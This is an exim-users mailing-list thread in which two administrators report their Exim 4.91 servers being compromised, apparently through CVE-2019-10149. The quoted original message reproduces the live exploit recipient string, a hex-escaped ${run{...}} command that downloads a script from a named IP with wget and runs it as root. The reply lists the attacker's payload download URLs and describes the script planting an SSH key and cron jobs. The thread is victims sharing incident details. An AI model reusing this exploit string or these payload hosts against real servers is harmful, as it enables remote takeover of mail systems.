Re: [exim] just been hacked, could be CVE-2019-10149?

Góra strony
Delete this message
Reply to this message
Autor: Konstantin Boyandin
Data:  
Dla: exim-users
Temat: Re: [exim] just been hacked, could be CVE-2019-10149?
Hi Calum,

Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
attacked yesterday by similar means. The attacker, in my case, tried to
download and execute one of the below (I excluded scheme prefix from links):

an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2web dot io/src/ldm
an7kmd2wp4xo7hpr dot onion dot sh/src/ldm

The script (ldm) itself is quite non-professional and buggy - the VM
wasn't available via SSH, thus the attack only resulted in copying RSA
key of would-be hacker to root' authorized keys and inserting cron tasks
to re-attempt the above.

I don't know where to report such things. To malware/antivirus
manufacturers, perhaps?

But the proper question is, IMHO, "why I haven't hardened my Exim
installations while I could".

Sincerely,
Konstantin

Calum Mackay via Exim-users писал 2019-06-11 07:10:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits
> yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
>

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>
>
> thanks,
> calum.